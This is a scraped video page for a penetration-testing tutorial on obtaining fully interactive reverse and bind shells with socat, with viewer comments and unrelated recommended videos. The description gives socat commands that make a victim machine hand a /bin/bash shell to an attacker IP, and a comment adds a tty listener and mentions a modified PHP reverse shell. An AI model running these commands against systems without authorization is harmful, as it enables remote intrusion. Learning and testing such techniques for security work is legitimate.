How To Get A FULLY Interactive Reverse Shell in Linux OR Windows

preview_player
Показать описание

Netcat is an amazing tool and is so useful and versatile for penetration tests and even other IT administration tasks. However, it is very limited, especially with Penetration Testing.
A Reverse Shell with Socat will give you a much higher degree of interactivity, even allowing you functionality to edit files in the command line, just like a SSH session.

Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Attacker: socat - TCP4:192.168.1.1:4443

Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT

Encrypted Bind / Reverse Shells

Links:
__________________________________________

About JSON SEC
___________________________________________
JSON SEC is a channel dedicated to helping you advance your cyber security career, whether you're on the Red Team or Blue Team side. Focusing on Training and Course reviews, exam prep guides, career guidance and advice as well as hacking tutorials.

Please consider subscribing if you enjoyed this video.
  1. Jason Ford {JSON:SEC}
  2. interactive shell
  3. pimp my shell
  4. fully interactive reverse shell
  5. fully interactive shell linux
  6. how to edit files in netcat
Рекомендации по теме
How to get 0:01:02

How to get Full Body Haki (really fast method) Blox Fruits

How Do You 0:06:01

How Do You Get To Know Yourself Fully? - Sadhguru answers at Entreprenuers Organization Meet

*FASTEST* Way To 0:04:29

*FASTEST* Way To Get FULL BODY Haki In Blox Fruits!

Easiest Way To 0:05:48

Easiest Way To Get Full Body Haki in blox fruit

How To Get 0:00:18

How To Get FULL BODY Aura FAST in Blox Fruits #shorts #roblox #bloxfruits #haki #aura #enhancement

The EASIEST Way 0:09:03

The EASIEST Way To Get FULL BODY HAKI In Blox Fruits!

HOW TO GET 0:35:12

HOW TO GET A FULLY-FUNDED SCHOLARSHIP IN THE U.S. || The Secret Only A Few People Know!

BEST METHOD TO 0:05:20

BEST METHOD TO GET FULL BODY HAKI FASTER in Blox Fruits

How to get 0:04:40

How to get Full stack of Legendary lords in Warhammer 3!

HOW TO GET 0:04:55

HOW TO GET FULL RES EASILY! (STAGE 1,2,3 Tutorial) | Type Soul Guide

*Full Guide* How 0:04:02

*Full Guide* How to get full body haki in blox fruits fast without auto clicker | full body haki

How To Get 0:17:52

How To Get A 100% (Full Ride) Scholarship Abroad

How To Get 0:00:53

How To Get Full Body Haki WHILE YOU SLEEP! #shorts

Get Fully FUNDED 0:07:53

Get Fully FUNDED PhD in USA | 6 EASY Steps | Application Process SIMPLIFIED | Indian Students | V-1

How To Get 0:00:15

How To Get 'FULL WHITE' Superhero skin! (June 2021)

*FULL GUIDE* How 0:07:40

*FULL GUIDE* How to get CDK! (LEVEL 2200) | Blox Fruits

Type Soul *NEW* 0:05:01

Type Soul *NEW* Update How To Get Full Res Rework Stage 3 Fast Progression + Full Guide!!

How to get 0:13:21

How to get into fully funded PhD in USA as an International Student

*FULL GUIDE* How 0:04:42

*FULL GUIDE* How To Get *TUSHITA* Sword FAST in Blox Fruits

How To Get 0:00:21

How To Get 'FULL PURPLE' Superhero Skin Like Clix! (June 2021)

How to Get 0:01:21

How to Get v4 Without Full moon and doing trial

Blox Fruits How 0:04:39

Blox Fruits How To Get Full Body Haki Fast! Roblox

Fastest Way To 0:00:48

Fastest Way To Get Full Body Haki In Blox Fruits Roblox

How to get 0:12:12

How to get a fully funded admission with a 2:2

Комментарии
Автор

You can usually upgrade the shell using the python command to spawn the upgraded shell but that doesn't work when python isn't installed. This is the best way in those scenarios. Thanks for the simple and to the point video.

NeerajBhojwani-rd
Автор

The biggest selling point is that you can encrypt the connection with socat.

MarsTheProgrammer
Автор

thank you for that. Now, show everybody how to socat using ssl, transfer files and something else interesting:)

Urbancorax
Автор

have you tried spawning a tty while using nc, you can also use the stty trick to make sure `Ctrl + C` doesn't kill the process

mercury
Автор

Very great video, thank you very much!

MartinGaertner
Автор

It'd be great if i could do that on windows...

vikhyatverma
Автор

The problem is they dont have socat installed, and any compiler

BellatrixLugosi
Автор

Is there away to reverse shell over the internet?

chileaus
Автор

but don't you need the target to have socat to be installed? on Windows target isnt this super unlikely

Mike-cptj
Автор

The Windows 11 isolation core and memory integrity protect against this type of attacks? And if i got filtrated ports, router with firewall, nat, antivirus and PC firewall?

unam
Автор

ty so much, can you start doing some try to hack me walkthrough videos? your explaining realy good and it would be nice to learn from you more

papahorse
Автор

I run socat on a windows machine in a cmd with admin rights. but unfortunately i only have user rights in the remote shell after a successful connection. Does anyone have a solution for this ?

Carinala
Автор

Noice. 👍 Just wanna hightlight some things because I ran into them while doing this.
socat file:`tty`, raw, echo=0 tcp-listen:4444

This listener didn't work properly when I tried to get reverse shell from target (say php or any kinda exploit / nc rev shell etc.)
Initially I thought this has to do something with bash/zsh. But it wasn't.

Finally, I got rev shell on nc first. Got socat is present on target. Then I created another shell with socat. ✌✌

Edit: Modified php-rev-shell to directly give me shell on socat. Better now. :)

iakashx
Автор

this is good but not every victim machine will have socat preinstall

bendomino